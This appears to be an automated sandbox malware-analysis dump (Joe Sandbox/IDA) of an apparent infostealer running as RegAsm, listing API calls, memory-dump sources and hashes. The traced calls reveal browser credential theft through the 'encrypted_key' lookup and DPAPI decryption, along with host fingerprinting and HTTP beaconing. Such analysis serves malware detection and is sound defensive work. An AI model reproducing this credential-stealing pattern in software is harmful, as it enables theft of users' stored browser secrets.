                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                      • API String ID: 161838763-3310892237
                                                                                      • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                      • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                      • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                      • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                        • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                        • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                        • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                        • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                        • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                        • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                        • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                      • String ID: $"encrypted_key":"$DPAPI
                                                                                      • API String ID: 2311102621-738592651
                                                                                      • Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                      • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                      • Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                      • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                      • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocOpenProcessQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3676486918-0
                                                                                      • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                      • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                      • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                      • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                      APIs
                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                      • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                        • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                        • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                        • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                        • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                      • String ID: nzA
                                                                                      • API String ID: 153043497-1761861442
                                                                                      • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                      • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                      • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                      • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                      APIs
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                        • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                        • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                        • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                        • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                        • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                        • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                      • String ID: ERROR$ERROR
                                                                                      • API String ID: 3086566538-2579291623
                                                                                      • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                      • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                      • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                      • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateObjectSingleSleepThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 4198075804-0
                                                                                      • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                      • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                      • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                      • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                      • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                      • String ID:
                                                                                      • API String ID: 1065093856-0
                                                                                      • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                      • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                      • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                      • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                      APIs
                                                                                      • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C0E3095
                                                                                        • Part of subcall function 6C0E35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C16F688,00001000), ref: 6C0E35D5
                                                                                        • Part of subcall function 6C0E35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0E35E0
                                                                                        • Part of subcall function 6C0E35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0E35FD
                                                                                        • Part of subcall function 6C0E35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0E363F
                                                                                        • Part of subcall function 6C0E35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0E369F
                                                                                        • Part of subcall function 6C0E35A0: __aulldiv.LIBCMT ref: 6C0E36E4
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E309F
                                                                                        • Part of subcall function 6C105B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
                                                                                        • Part of subcall function 6C105B50: EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
                                                                                        • Part of subcall function 6C105B50: LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
                                                                                        • Part of subcall function 6C105B50: GetTickCount64.KERNEL32 ref: 6C105BE4
                                                                                      • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0E30BE
                                                                                        • Part of subcall function 6C0E30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C0E3127
                                                                                        • Part of subcall function 6C0E30F0: __aulldiv.LIBCMT ref: 6C0E3140
                                                                                        • Part of subcall function 6C11AB2A: __onexit.LIBCMT ref: 6C11AB30
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                      • String ID:
                                                                                      • API String ID: 4291168024-0
                                                                                      • Opcode ID: a6adb042548e604af18a52f8bec49c389fb426f095ba7625ecc5b3e49d604044
                                                                                      • Instruction ID: b9483ef2c96763ce918de4e17eefc21e9229f0fc1281c85d5cfca47055c39931
                                                                                      • Opcode Fuzzy Hash: a6adb042548e604af18a52f8bec49c389fb426f095ba7625ecc5b3e49d604044
                                                                                      • Instruction Fuzzy Hash: 2DF0F922E2474496CA10DF3588413F6B771EF6F218F10672AE85457631FB2072D9D3C6
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                      • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateComputerNameProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1664310425-0
                                                                                      • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                      • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                      • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                      • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
